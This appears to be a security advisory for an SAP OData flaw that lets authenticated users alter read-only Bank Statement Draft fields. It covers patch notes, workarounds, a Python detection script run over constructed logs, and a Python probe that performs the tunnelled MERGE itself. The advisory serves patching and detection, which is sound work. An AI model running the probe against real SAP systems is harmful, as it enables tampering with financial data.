CVE-2024-45282
📋 TL;DR
This vulnerability lets an authenticated user modify fields that the Manage Bank Statements application treats as read-only in a Bank Statement Draft by sending an OData MERGE request directly to the service, bypassing the UI. It affects SAP systems that ship the vulnerable component and expose the OData service to users. The result is a loss of integrity for financial data.
💻 Affected Systems
- SAP S/4HANA
- SAP ERP
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Malicious actors could alter bank statement data, leading to financial discrepancies, incorrect reconciliations, or fraudulent transactions being processed.
Likely Case
Unauthorized modification of bank statement fields could cause data integrity issues requiring manual correction and investigation.
If Mitigated
With proper access controls and monitoring, impact would be limited to minor data inconsistencies that can be detected and corrected.
🎯 Exploit Status
Requires authenticated access to the OData service endpoint
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: See SAP Note 3251893 for specific patch versions
Vendor Advisory: https://me.sap.com/notes/3251893
Restart Required: Yes
Instructions:
1. Review SAP Note 3251893.
2. Apply the relevant SAP Security Patch Day updates.
3. Restart affected SAP systems.
4. Verify the fix by sending a MERGE against a read-only draft field and confirming the stored value does not change.
🔧 Temporary Workarounds
Restrict OData Service Access
Limit access to the vulnerable OData service endpoint to authorized users only.
Configure SAP authorization roles to restrict access to /sap/opu/odata/sap/API_BANK_STATEMENT_DRAFT_SRV (confirm the exact service name and its activation status in transaction /IWFND/MAINT_SERVICE before relying on this path).
Implement Input Validation
Add custom validation that rejects MERGE (and PATCH) requests attempting to modify read-only fields.
Implement a BAdI or enhancement that discards or rejects changes to read-only fields before the draft is updated. This is a stopgap only; it does not replace the note.
🧯 If You Can't Patch
- Implement strict access controls to limit who can access the Manage Bank Statements application
- Enable detailed auditing and monitoring of all OData MERGE operations on bank statement drafts, including PATCH and POST requests that tunnel the verb via the X-HTTP-Method header
🔍 How to Verify
Check if Vulnerable:
On a non-production copy with a dedicated test user, read a Bank Statement Draft, send an OData MERGE to the vulnerable endpoint that sets a read-only field, then re-read the draft. The system is vulnerable if the stored value changed; the HTTP status alone is not conclusive.
Check Version:
Check the component version and support package level in transaction SPAM, and the implementation status of SAP Note 3251893 in transaction SNOTE
Verify Fix Applied:
After patching, repeat the MERGE probe and confirm the read-only field is either rejected or left unchanged; test both the bare MERGE verb and the POST + X-HTTP-Method: MERGE form
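The read / MERGE / re-read probe described above, as an added example that is not part of the advisory or of any SAP tooling. It assumes the service path named on this page; the entity set, key and field names are placeholders that must be taken from the service's $metadata document, and the script should only be run against a non-production system with a dedicated test user. It sends the MERGE tunnelled as POST with X-HTTP-Method, which SAP Gateway accepts alongside the bare verb, so run it once per form.

```python
"""Probe whether a Bank Statement Draft read-only field accepts an OData MERGE.

Added example, not code from the advisory or from SAP.  Assumptions:
- SERVICE is the path named in the advisory above;
- entity_set, key and field are PLACEHOLDERS from the service's $metadata;
- run only on a non-production system with a dedicated test user.
"""
import base64
import http.cookiejar
import json
import urllib.error
import urllib.request

SERVICE = "/sap/opu/odata/sap/API_BANK_STATEMENT_DRAFT_SRV"


def basic_auth(user, password):
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def build_merge_request(base_url, entity_set, key, field, value, csrf_token):
    """Return (method, url, headers, body) for an OData V2 MERGE.

    SAP Gateway accepts MERGE as the HTTP verb or tunnelled as POST with an
    X-HTTP-Method header.  The tunnelled form is built here because some
    proxies refuse non-standard verbs; a fixed system must handle both forms
    safely, so probe the bare verb as well.
    """
    url = f"{base_url}{SERVICE}/{entity_set}({key})"
    headers = {
        "Content-Type": "application/json",
        "Accept": "application/json",
        "X-HTTP-Method": "MERGE",
        "X-CSRF-Token": csrf_token,
    }
    return "POST", url, headers, json.dumps({field: value})


def assess(status, before, after, attempted):
    """Classify one probe.  Only an actual change of the stored value counts
    as vulnerable; a 2xx that leaves the field untouched does not."""
    if after == before:
        outcome = "MERGE accepted" if 200 <= status < 300 else f"HTTP {status}"
        return f"NOT VULNERABLE: field unchanged, {outcome}"
    if after == attempted:
        return "VULNERABLE: read-only field changed via MERGE"
    return "INVESTIGATE: field changed to an unexpected value"


def probe(base_url, user, password, entity_set, key, field, new_value):
    """Run read / MERGE / re-read against a live system (new_value must differ
    from the current value or the probe proves nothing)."""
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar()))
    auth = basic_auth(user, password)
    entity_url = f"{base_url}{SERVICE}/{entity_set}({key})"

    def get(url, extra=None):
        req = urllib.request.Request(url, headers={
            "Authorization": auth, "Accept": "application/json", **(extra or {})})
        with opener.open(req) as resp:
            return resp.headers, json.load(resp)["d"]   # OData V2 wraps in "d"

    # 1. Fetch a CSRF token.  It is bound to the session cookie the opener now
    #    holds, so the same opener must send the MERGE.
    hdrs, before = get(entity_url, {"X-CSRF-Token": "Fetch"})
    token = hdrs.get("X-CSRF-Token", "")

    # 2. Attempt the MERGE on the read-only field.
    method, url, headers, body = build_merge_request(
        base_url, entity_set, key, field, new_value, token)
    headers["Authorization"] = auth
    req = urllib.request.Request(url, data=body.encode(), headers=headers, method=method)
    try:
        with opener.open(req) as resp:
            status = resp.status
    except urllib.error.HTTPError as err:
        status = err.code

    # 3. Re-read and compare; the stored value, not the status code, decides.
    _, after = get(entity_url)
    return assess(status, before.get(field), after.get(field), new_value)
```

Call `probe("https://sap.example.internal", user, password, "<EntitySet>", "'<key>'", "<ReadOnlyField>", "<test value>")` with values from your own $metadata; the result string starts with VULNERABLE, NOT VULNERABLE or INVESTIGATE.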
📡 Detection & Monitoring
Log Indicators:
- Unusual OData MERGE or PATCH requests to bank statement draft endpoints, including POST requests carrying an X-HTTP-Method: MERGE header
- Multiple failed modification attempts on read-only fields
Network Indicators:
- HTTP PATCH/MERGE requests (or POST with X-HTTP-Method: MERGE) to /sap/opu/odata/sap/API_BANK_STATEMENT_DRAFT_SRV carrying field values in the body
SIEM Query (illustrative; the event and field names below are not standard SAP log fields and must be mapped to however your ICM HTTP log or Gateway log is ingested):
source="sap_audit_log" AND (event="ODATA_MODIFY" OR event="FIELD_MODIFICATION") AND resource="BANK_STATEMENT_DRAFT" AND status="SUCCESS"
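The log and network indicators above, run over sample HTTP access log lines, as an added example that is not part of the advisory. The log lines are constructed and use a simple space-separated layout (timestamp, client IP, user, request line, status, X-HTTP-Method override or "-"); SAP's ICM HTTP log format is configurable and reverse proxies use their own, so the regex must be adapted. The override column is the important part: a rule that only matches the verb misses a POST that SAP Gateway treats as MERGE.

```python
"""Flag OData MERGE/PATCH traffic against the Bank Statement Draft service.

Added example, not part of the advisory.  SAMPLE_LOG is CONSTRUCTED; adapt
LINE_RE to your real ICM or reverse-proxy log format.
"""
import re
from collections import defaultdict

SERVICE = "/sap/opu/odata/sap/API_BANK_STATEMENT_DRAFT_SRV"
WRITE_METHODS = {"MERGE", "PATCH"}

# timestamp ip user "METHOD path HTTP/x" status x-http-method-override
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) (?P<user>\S+) '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<override>\S+)$')

SAMPLE_LOG = """\
2024-10-08T10:12:01Z 10.0.0.5 JDOE "POST /sap/opu/odata/sap/API_BANK_STATEMENT_DRAFT_SRV/BankStatementDraft('1') HTTP/1.1" 204 MERGE
2024-10-08T10:12:05Z 10.0.0.5 JDOE "MERGE /sap/opu/odata/sap/API_BANK_STATEMENT_DRAFT_SRV/BankStatementDraft('2') HTTP/1.1" 403 -
2024-10-08T10:12:06Z 10.0.0.5 JDOE "MERGE /sap/opu/odata/sap/API_BANK_STATEMENT_DRAFT_SRV/BankStatementDraft('3') HTTP/1.1" 403 -
2024-10-08T10:12:07Z 10.0.0.5 JDOE "PATCH /sap/opu/odata/sap/API_BANK_STATEMENT_DRAFT_SRV/BankStatementDraft('4') HTTP/1.1" 400 -
2024-10-08T10:13:00Z 10.0.0.9 ASMITH "GET /sap/opu/odata/sap/API_BANK_STATEMENT_DRAFT_SRV/BankStatementDraft HTTP/1.1" 200 -
2024-10-08T10:13:30Z 10.0.0.9 ASMITH "POST /sap/opu/odata/sap/API_BANK_STATEMENT_DRAFT_SRV/BankStatementDraft HTTP/1.1" 201 -
2024-10-08T10:14:00Z 10.0.0.7 BOT "MERGE /sap/opu/odata/sap/OTHER_SRV/Thing('9') HTTP/1.1" 204 -
"""


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def effective_method(rec):
    """Resolve the tunnelled verb: POST plus an X-HTTP-Method override wins."""
    if rec["method"] == "POST" and rec["override"].upper() in WRITE_METHODS:
        return rec["override"].upper()
    return rec["method"]


def find_merge_events(log_text):
    """Return every write (MERGE/PATCH, bare or tunnelled) against SERVICE."""
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(SERVICE):
            continue
        if effective_method(rec) in WRITE_METHODS:
            events.append(rec)
    return events


def summarize(events, failure_threshold=3):
    """Successful writes are each worth review while unpatched; repeated
    rejections from one user look like probing of read-only fields."""
    successful = [e for e in events if 200 <= e["status"] < 300]
    failures = defaultdict(int)
    for e in events:
        if e["status"] >= 400:
            failures[e["user"]] += 1
    repeated = {u: n for u, n in failures.items() if n >= failure_threshold}
    return {"successful": successful, "repeated_failures": repeated}


if __name__ == "__main__":
    report = summarize(find_merge_events(SAMPLE_LOG))
    for e in report["successful"]:
        print(f"ALERT successful {effective_method(e)} by {e['user']} "
              f"from {e['ip']} -> {e['path']}")
    for user, n in report["repeated_failures"].items():
        print(f"ALERT {n} rejected write attempts by {user}")
```

On the constructed sample this flags JDOE's tunnelled MERGE that returned 204 and JDOE's three rejected attempts; ASMITH's plain POST (no override) and the MERGE against a different service are ignored.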